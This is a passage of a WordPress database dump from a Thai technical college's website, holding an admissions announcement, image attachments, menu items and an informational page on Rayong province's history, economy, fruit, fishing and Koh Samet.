(798, 3, '2018-01-25 15:28:45', '2018-01-25 08:28:45', '<h2><strong>-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)</strong></h2>\r\n<h2><strong> -รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)</strong></h2>\r\n \r\n\r\n<img class=\"wp-image-777 aligncenter\" src=\"/wp-content/uploads/2018/01/ปฏิทินการรับสมัคร-ปีการศึกษา-2561-212x300.jpg\" alt=\"\" width=\"574\" height=\"812\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตรปวช. และหลักสูตรปวส.', '', 'inherit', 'closed', 'closed', '', '775-revision-v1', '', '', '2018-01-25 15:28:45', '2018-01-25 08:28:45', '', 775, 'http://www.technicrayong.ac.th/775-revision-v1/', 0, 'revision', '', 0),
(799, 3, '2018-01-25 15:39:14', '2018-01-25 08:39:14', '', '27023423_533006667075526_6777013135087833409_o', '', 'inherit', 'closed', 'closed', '', '27023423_533006667075526_6777013135087833409_o', '', '', '2018-01-25 15:40:01', '2018-01-25 08:40:01', '', 775, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/27023423_533006667075526_6777013135087833409_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(800, 3, '2018-01-25 15:40:28', '2018-01-25 08:40:28', '<h2><strong>-รับผู้จบ ม.3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.)</strong></h2>\r\n<h2><strong> -รับผู้จบ ปวช. และ ม.6 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.)</strong></h2>\r\n \r\n\r\n<img class=\"aligncenter wp-image-799\" src=\"/wp-content/uploads/2018/01/27023423_533006667075526_6777013135087833409_o-212x300.jpg\" alt=\"\" width=\"615\" height=\"870\" />', 'ปฏิทินรับสมัครสอบคัดเลือก ประจำปีการศึกษา 2561 หลักสูตรปวช. และหลักสูตรปวส.', '', 'inherit', 'closed', 'closed', '', '775-revision-v1', '', '', '2018-01-25 15:40:28', '2018-01-25 08:40:28', '', 775, 'http://www.technicrayong.ac.th/775-revision-v1/', 0, 'revision', '', 0),
(806, 3, '2018-01-29 11:37:00', '2018-01-29 04:37:00', '<h1><a href=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466.jpg\"><img class=\"aligncenter size-large wp-image-1914\" src=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a></h1>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">ประกาศรายชื่อผู้มีสิทธิ์สอบ</span></h1>\r\n \r\n<h2 style=\"text-align: center;\"><a href=\"https://goo.gl/RGU4eU\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ff0000;\">กดเพื่อเปิดดู</span></a></h2>\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_01.png\"><img class=\"aligncenter size-large wp-image-1007\" src=\"/wp-content/uploads/2018/01/201802061754_Page_01-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_02.png\"><img class=\"aligncenter size-large wp-image-1008\" src=\"/wp-content/uploads/2018/01/201802061754_Page_02-694x1024.png\" alt=\"\" width=\"640\" height=\"944\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_03.png\"><img class=\"aligncenter size-large wp-image-1009\" src=\"/wp-content/uploads/2018/01/201802061754_Page_03-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_04.png\"><img class=\"aligncenter size-large wp-image-1010\" src=\"/wp-content/uploads/2018/01/201802061754_Page_04-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_05.png\"><img class=\"aligncenter size-large wp-image-1011\" src=\"/wp-content/uploads/2018/01/201802061754_Page_05-685x1024.png\" alt=\"\" width=\"640\" height=\"957\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_06.png\"><img class=\"aligncenter size-large wp-image-1012\" src=\"/wp-content/uploads/2018/01/201802061754_Page_06-735x1024.png\" alt=\"\" width=\"640\" height=\"892\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_07.png\"><img class=\"aligncenter size-large wp-image-1013\" src=\"/wp-content/uploads/2018/01/201802061754_Page_07-687x1024.png\" alt=\"\" width=\"640\" height=\"954\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_08.png\"><img class=\"aligncenter size-large wp-image-1014\" src=\"/wp-content/uploads/2018/01/201802061754_Page_08-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_09.png\"><img class=\"aligncenter size-large wp-image-1015\" src=\"/wp-content/uploads/2018/01/201802061754_Page_09-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_10.png\"><img class=\"aligncenter size-large wp-image-1016\" src=\"/wp-content/uploads/2018/01/201802061754_Page_10-700x1024.png\" alt=\"\" width=\"640\" height=\"936\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_11.png\"><img class=\"aligncenter size-large wp-image-1017\" src=\"/wp-content/uploads/2018/01/201802061754_Page_11-681x1024.png\" alt=\"\" width=\"640\" height=\"962\" /></a>', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%9b%e0%b8%b4', '', '', '2018-03-16 07:00:44', '2018-03-16 00:00:44', '', 0, 'http://www.technicrayong.ac.th/?p=806', 467, 'post', '', 0),
(807, 3, '2018-01-29 11:34:06', '2018-01-29 04:34:06', '', '27024291_535295693513290_2564198707510501767_o', '', 'inherit', 'closed', 'closed', '', '27024291_535295693513290_2564198707510501767_o', '', '', '2018-01-29 11:34:06', '2018-01-29 04:34:06', '', 806, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(808, 3, '2018-01-29 11:35:08', '2018-01-29 04:35:08', '<img class=\"aligncenter wp-image-807\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o-300x79.jpg\" alt=\"\" width=\"963\" height=\"254\" />', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-revision-v1', '', '', '2018-01-29 11:35:08', '2018-01-29 04:35:08', '', 806, 'http://www.technicrayong.ac.th/806-revision-v1/', 0, 'revision', '', 0),
(809, 3, '2018-01-29 11:36:34', '2018-01-29 04:36:34', '<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-revision-v1', '', '', '2018-01-29 11:36:34', '2018-01-29 04:36:34', '', 806, 'http://www.technicrayong.ac.th/806-revision-v1/', 0, 'revision', '', 0),
(810, 3, '2018-01-29 13:56:35', '2018-01-29 06:56:35', '', 'เกี่ยวกับวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8-9-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:30', '2022-04-29 05:30:30', '', 0, 'http://www.technicrayong.ac.th/?p=810', 4, 'nav_menu_item', '', 0),
(812, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'งานบุคลากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=812', 9, 'nav_menu_item', '', 0),
(813, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'งานหลักสูตร', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=813', 11, 'nav_menu_item', '', 0),
(814, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'ข้อมูลนักเรียนนักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%ad%e0%b8%9a%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=814', 8, 'nav_menu_item', '', 0),
(815, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'ข้อมูลพื้นฐานจังหวัด', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%88%e0%b8%b1%e0%b8%87%e0%b8%ab%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=815', 6, 'nav_menu_item', '', 0),
(816, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'งานแผน', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=816', 10, 'nav_menu_item', '', 0),
(817, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'งานพัสดุ', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=817', 12, 'nav_menu_item', '', 0),
(818, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'งานอาคารสถานที่', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=818', 13, 'nav_menu_item', '', 0),
(819, 3, '2018-01-29 14:39:09', '2018-01-29 07:39:09', '', 'ข้อมูลสถานศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2022-04-29 12:30:31', '2022-04-29 05:30:31', '', 0, 'http://www.technicrayong.ac.th/?p=819', 7, 'nav_menu_item', '', 0),
(820, 3, '2018-01-29 14:42:02', '2018-01-29 07:42:02', '', 'ข้อมูลสารสนเทศ 9 ประการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%99%e0%b9%80%e0%b8%97%e0%b8%a8-9-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3-2', '', '', '2022-04-29 12:30:30', '2022-04-29 05:30:30', '', 0, 'http://www.technicrayong.ac.th/?p=820', 5, 'nav_menu_item', '', 0),
(821, 3, '2018-01-29 15:12:30', '2018-01-29 08:12:30', '<h2><a href=\"/wp-content/uploads/2019/02/cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52.jpg\"><img class=\"aligncenter wp-image-5244\" src=\"/wp-content/uploads/2019/02/cropped-e0b980e0b8a1e0b8a9e0b8b2-e0b8aae0b8a3e0b989e0b8ade0b8a2e0b894e0b8b52.jpg\" alt=\"\" width=\"1500\" height=\"316\" /></a></h2>\r\n<h2 class=\"componentheading\"><span style=\"color: #000000;\"><strong>ประวัติความเป็นมาของจังหวัดระยอง</strong></span></h2>\r\n<div>\r\n<h4>ระยอง เริ่มปรากฎชื่อในพงศาวดารเมื่อปี พ.ศ.2113 ในรัชสมัยของสมเด็จพระมหาธรรมราชาแห่งกรุงศรีอยุธยา โดยมีประวัติดั้งเดิมตามข้อสันนิษฐานว่า น่าจะก่อตั้งเมืองขึ้นเมื่อประมาณ พ.ศ. 1500 ยุคที่ขอมมีอานุภาพเฟื่องฟูแถบดินแดนสุวรรณภูมิ นักโบราณคดีได้สันนิษฐานจากหลักฐานที่พบ คือ ซากศิลาแลงคูค่ายที่ยังหลงเหลืออยู่ในเขตอำเภอบ้านค่าย อันเป็นศิลปะการก่อสร้างแบบขอม โดยในสมัยโบราณ ระยองมีชนพื้นเมืองคือชาวซอง ซึ่งเป็นเผ่าที่อาศัยอยู่กระจายโดยทั่วไปในภาคตะวันออก ในประวัติศาสตร์ตอนหนึ่งได้กล่าวถึงเมืองระยองในปลายสมัยกรุงศรีอยุธยา ระหว่างที่กรุงศรีอยุธยาใกล้จะเสียแก่พม่าเป็นครั้งที่ 2 ในสมัยพระเจ้าเอกทัศน์ ในเดือนยี่ปี พ.ศ.2309 พระยาวชิรปราการ หรือ พระยาตาก พร้อมไพร่พลประมาณ 500 คน ได้ตีฝ่าวงล้อมทัพพม่า มุ่งสู่ตะวันออกมาหยุดพักไพร่พลที่เมืองระยอง และได้ปราบปรามคณะกรรมการเมืองที่แข็งข้อยึดเมืองระยองได้ จากความสามารถครั้งนั้น เหล่าทหารจึงยกย่องให้เป็น \"เจ้าตากสิน\" ก่อนเดินทัพไปยังเมืองจันทบุรี เพื่อยึดที่ดินในการกอบกู้อิสรภาพคืนจากพม่าได้ในปี พ.ศ.2113</h4>\r\n<div class=\"article_column column1 cols1\">\r\n<div class=\"\">\r\n<h2><span style=\"color: #000000;\"><strong><span class=\"important-title-blue\">ข้อมูลทั่วไปของจังหวัดระยอง</span></strong></span></h2>\r\n<h4>ระยอง..... เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศไทย ที่เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้ต่อหัวประชากรสูง เป็นอันดับหนึ่งของประเทศ เมื่อก่อนจังหวัดระยองจะเป็นที่รู้จักในฐานะเมืองแห่งผลไม้ดีของภาคตะวันออก ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้ง อาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากความเหมาะสมของสภาพดินฟ้าอากาศที่เอื้ออำนวยและสภาพภูมิประเทศที่เหมาะสม นอกจากนั้น ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม เนื่องจากมีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดก็เป็นที่รู้จักแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทยและชาวต่างประเทศ ฐานเศรษฐกิจที่สำคัญของจังหวัดคือเกษตรกรรม การท่องเที่ยว และอุตสาหกรรม จังหวัดระยองเริ่มมีการเปลี่ยนแปลงไปเป็นจังหวัดอุตสาหกรรม นับตั้งแต่การค้นพบก๊าซธรรมชาติในอ่าวไทย เมื่อปี พ.ศ. 2520 เป็นการเริ่มต้นยุค “โชติช่วงชัชวาลย์” และเป็นที่มาของ “โครงการพัฒนาพื้นที่ชายฝั่งทะเลตะวันออก” (Eastern Seaboard Development Program) ในปี 2524 ในช่วงระยะเวลากว่า 20 ปีที่ผ่านมานั้น ได้ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยอง เปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและการเกษตร ปัจจุบันรายได้เฉลี่ยต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1,143,740 บาท/คน ผลิตภัณฑ์มวลรวมจังหวัด (GPP) เท่ากับ 672,104 ล้านบาท โดยมาจาก สาขาการผลิตด้านอุตสาหกรรม กว่าร้อยละ 92 จังหวัดระยองได้นำข้อมูลด้านต่าง ๆ ทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์อื่น ๆ มาเรียบเรียงลงในหนังสือเล่มนี้ เพื่อให้ผู้ที่ได้อ่านหนังสือเล่มนี้จะได้รู้จักจังหวัดระยองมากขึ้น และหวังเป็นอย่างยิ่งว่าจะเป็นสื่อที่ช่วยส่งเสริม เผยแพร่และประชาสัมพันธ์จังหวัดระยอง ให้เป็นที่รู้จักกว้างขวางยิ่งขึ้น หากมีข้อบกพร่องประการใด คณะผู้จัดทำยินดีน้อมรับเพื่อนำไปปรับปรุงแก้ไขในโอกาสต่อไป <strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></strong></h4>\r\n<div></div>\r\n<div><img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" /></div>\r\n<div><img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" /></div>\r\n<div>\r\n<h2 class=\"contentheading\"><span style=\"color: #000000;\"><strong>คำขวัญจังหวัด</strong></span></h2>\r\n<h3><span style=\"color: #000000;\"><em><span class=\"important-title-blue\"><strong>ผลไม้รสล้ำ</strong></span></em></span></h3>\r\n<h4>ระยอง ได้ชื่อว่าเป็นเมืองที่หลากหลายไปด้วยผลไม้นานาชนิด อาทิเช่น ทุเรียน เงาะ สับปะรดมังคุด มะม่วง กล้วย ลองกอง และบางชนิดได้ชื่อว่ามีรสชาดดีหรืออร่อยที่สุดในโลก ซึ่งได้แก่ ทุเรียน สับปะรดผลไม้ 5 ลำดับแรก ที่ทำรายได้สูงสุดให้จังหวัดระยอง ได้แก่ 1. ทุเรียน 2. สับปะรด 3. มะม่วง 4. เงาะ 5. มังคุด จังหวัดระยองได้จัดงาน \"เทศกาลผลไม้และของดีจังหวัดระยอง\" เป็นประจำทุกปีในช่วงฤดูผลไม้ออกผลประมาณเดือนพฤษภาคมของทุกปี เพื่อเป็นการส่งเสริมการจำหน่ายผลผลิตด้านผลไม้และส่งเสริมการท่องเที่ยวระยะเวลาที่จัดประมาณ 10 วัน มีกิจกรรมต่าง ๆ เช่น การประกวดขบวนรถผลไม้ การประกวดธิดาชาวสวนการประกวดผลไม้ การแข่งขันรับประทานผลไม้ เนื่องจาก ผลไม้ของจังหวัดระยองมีรสชาด เป็นที่นิยมชมชอบรับประทานของชาวต่างประเทศ ดังนั้น ทาง กรอ.จังหวัดระยอง ร่วมกับหอการค้าจังหวัดระยอง ได้ผลักดันให้มีการส่งผลไม้ไปจำหน่ายยังต่างประเทศ ซึ่งอันได้แก่การส่งสับปะรดไปจำหน่ายยังประเทศสิงคโปร์ ฮ่องกง และยังได้ขอให้รัฐบาลผลักดันให้มีการ เปิดตลาดทุเรียนในประเทศจีน เนื่องจากชาวจีนนิยมรับประทานทุเรียนมาก และจีนมีประชากรนับ พันล้านคน หากเปิดตลาดจีนได้สำเร็จ ต่อไปจีนจะเป็นลูกค้าที่สำคัญรายใหญ่ของประเทศไทย นอกจากนี้ กรอ.จังหวัดระยองยังผลักดันให้มีการส่งทุเรียน ไปจำหน่ายที่ประเทศฮ่องกง โดยใช้สะนามบินอู่ตะเภา แทนสนามบินดอนเมือง ซึ่งได้รับการสนับสนุนจากกรมการบินพาณิชย์ กระทรวงคมนาคม ได้จัดเที่ยวบินมาขนส่งผลไม้จากสนามบินอู่ตะเภา ซึ่งเริ่มดำเนินการเป็นครั้งแรกเมื่อปี พ.ศ. 2536 ในช่วงฤดูผลไม้ที่ผ่านมา และปีนี้เป็นปีที่ 4 โดยคาดว่าต่อไปสนามบินอู่ตะเภาจะได้รับการพัฒนาให้เป็นสนามบินพาณิชย์โดย สมบูรณ์แบบอย่างแท้จริง เพื่อเป็นการส่งเสริมผลไม้ไทย บริษัท สุภัทราแลนด์ จำกัด ร่วมกับการท่องเที่ยวแห่งประเทศไทย สถานฑูตไทย ประจำประเทศสิงคโปร์ สถานฑูตไทยประจำประเทศมาเลเซียและจังหวัดระยอง ได้จัดงาน \"ส่งเสริมผลไม้และอาหารไทย\" ณ สถานฑูตไทยในประเทศสิงคโปร์และมาเลเซีย สินค้าที่นำไปจำหน่ายมี ทุเรียน เงาะ มะม่วง สับปะรด ส้มโอ มะละกอ ฝรั่ง ทุเรียนกวน สับปะรดกวน ผลไม้และน้ำผลไม้กระป๋อง และอาหารทะเลแห้ง ซึ่งการจัดงานดังกล่าวได้ดำเนินการมาเป็นเวลาหลายปีแล้ว เพื่อเป็นการเผยแพร่ชื่อเสียงด้าน \"ผลไม้รสล้ำ\" ให้แก่จังหวัดระยองเป็นอย่างยิ่ง และสร้างรายได้ให้เกษตรกรชาวสวนผลไม้ระยอง เพราะแท้จริงแล้วสิงคโปร์นั้นคือตลาดโลก จึงทำให้ผลไม้ของจังหวัดระยองเป็นที่เลื่องลือไปทั่วโลก</h4>\r\n<h3><span style=\"color: #000000;\"><em><strong>อุตสาหกรรมก้าวหน้า</strong></em></span></h3>\r\n<h4><span style=\"color: #000000;\"><strong>โครงการนิคมอุตสาหกรรมมาบตาพุด </strong></span>เป็นโครงการนำร่องภายใต้แผน Eastern Seaboard ที่รัฐบาลได้เตรียมโครงสร้างปัจจัยพื้นฐานไว้อย่างพร้อมเพรียง ได้แก่ ไฟฟ้า ประปา โทรศัพท์ ถนน แหล่งน้ำ ท่าเทียบเรือ จากสถิติการได้รับการส่งเสริมการลงทุนภาคอุตสาหกรรม จาก BOI ที่ผ่านมาเป็นที่ประจักษ์ว่าจังหวัดระยองมีการขอรับ และได้รับการอนุมัติการส่งเสริมการลงทุนมากเป็นอันดับ 1 ของประเทศ และมีแนวโน้มการได้รับการส่งเสริมการลงทุนให้มีการผลักดันความเจริญและการจ้างงานในภูมิภาค ของรัฐบาล จังหวัดระยองจึงมีความเจริญก้าวหน้า ด้านการลงทุนอุตสาหกรรม สามารถเป็นแหล่งรองรับการลงทุน ด้านอุตสาหกรรมผลิตปัจจัย 4 ได้ทุกประเภท ไม่ว่าจะเป็นผลิต เพื่อทดแทนการนำเข้าหรือเพื่อส่งออกตามเป้าหมายของรัฐบาลได้อย่างแน่นอน</h4>\r\n<h3 align=\"left\"><span style=\"color: #000000;\"><em><strong> น้ำปลารสเด็ด</strong></em></span></h3>\r\n<h4 align=\"justify\"><strong>ที่สุด</strong>ของน้ำปลาอยู่ที่จังหวัดระยอง กล่าวคือ มีโรรงานน้ำปลามากที่สุดในประเทศ โดยมีถึง 26 โรงงาน จากทั้งหมด 35 โรงงานทั่วประเทศ เงินลงทุน 52.88 ล้านบาท มีคนงานประมาณ 200 คน นอกจากนั้น ยังมีการผลิตน้ำปลาแบบ อุตสาหกรรมในครัวเรือนกระจายกันอยู่ทั่วไป ที่สำคัญน้ำปลาที่ผลิตยังมีรสชาติ แห่งความอร่อยเป็นรสสมกับคำขวัญว่า <strong>\" น้ำปลารสเด็ด \"</strong> อย่างแท้จริง ที่กล่าวว่าระยองเป็นเมืองน้ำปลารสเด็ดนั้น แท้จริงแล้วยังมีความหมายครอบคลุม ไปถึงการประมงทั้งหมด โดยที่จังหวัดระยองมีชายฝั่งทะเลยาวกว่า 100 กิโลเมตร อาชีพดั้งเดิมของชาวระยอง คือการทำประมง ปัจจุบันมีเรือประมง 1,230 ลำ มีเนื้อที่ทำการประมงในทะเล ประมาณ 6,225,000 ไร่ มีครัวเรือนที่ทำการประมง จำนวน 7,275 ครัวเรือน จำนวนชาวประมง 41,569 คน มีมูลค่าการผลิตจากการประมงในปีที่ผ่านมาเท่ากับ 3,535.73 ล้านบาท นอกจากนั้น ยังมีการเพาะเลี้ยงชายฝั่ง เช่น การเลี้ยงกุ้งกุลาดำ การเลี้ยงสัตว์น้ำกร่อย หรือการเลี้ยงปลาในกระชัง และการเลี้ยงสัตว์น้ำจืด</h4>\r\n<h3><span style=\"color: #000000;\"><em><strong>เกาะเสม็ดสวยหรู</strong></em></span></h3>\r\n<h4 align=\"justify\"><strong>เกาะเสม็ด</strong> หรือ เกาะแก้วพิสดาร เพชรเม็ดงามของจังหวัดระยอง ตั้งอยู่ที่หมู่ 4 ตำบลเพ อำเภอเมืองระยอง จังหวัดระยอง รวมพื้นที่ประมาณ 4.5 ไร่ ห่างจากฝั่งบ้านเพ ประมาณ 6.5 กิโลเมตร เป็นแหล่งดึงดูดนักท่องเที่ยว ทั้งชาวไทยและชาวต่างประเทศ มีหาดทรายสวยงามตามธรรมชาติ มีป่าไม้ และภูเขา ที่ธรรมชาติสร้างขึ้นแบบผสมผสานกลมกลืน บรรยากาศสงบเงียบ เหมาะแก่การพักผ่อนหย่อนใจและท่องเที่ยวเกาะเสม็ดนั้น แบ่งเป็น 2 ส่วน คือ ส่วนที่เป็นเขตอุทยานแห่งชาติ และส่วนที่ราษฎรอาศัยอยู่เดิม มีสถานที่พักบริการ เช่น บังกาโล รีสอร์ท อยู่เรียงรายริมชายหาด มีสิ่งอำนวยความสะดวกและสาธารณูปโภคในระดับดี ได้แก่ ท่าเทียบเรือเกาะเสม็ด ถนนและทางเดินเท้าคอนกรีตเสริมเหล็ก สระน้ำจืด(สระอโนดาษ) และไฟฟ้า ซึ่งการไฟฟ้าส่วนภูมิภาค จะทำการติดตั้งโรงจักรไฟฟ้าบนเกาะเสม็ด ในปี 2539 โดยมีแผนงานวางเคเบิ้ลใต้น้ำในโอกาสต่อไป</h4>\r\n<h4 align=\"justify\"><span style=\"color: #000000;\"><strong>ปัญหาที่สำคัญ </strong></span>ปัญหาที่สำคัญของเกาะเสม็ดคือ เรื่องขยะ ซึ่งนับวันจะมีมากขึ้น แม้ว่าทางราชการได้จัดสร้างเตาเผาขยะให้แล้วก็ตาม แต่ไม่สามารถกำจัดให้หมดสิ้นได้ ดังนั้น หากจะให้เกาะเสม็ดยังคงคงวามสวยหรู ขึ้นอยู่กับราษฎร ผู้ประกอบการและนักท่องเที่ยวบนเกาะเสม็ด ที่จะต้องช่วยกันรักษาเพชรเม็ดงามเม็ดนี้ไว้ นานแสนนาน</h4>\r\n<h3 align=\"justify\"><span style=\"color: #000000;\"><em><strong>สุนทรภู่กวีเอก</strong></em></span></h3>\r\n<h4><strong>สุนทรภู่</strong> เป็นรัตนกวีสี่แผ่นดิน 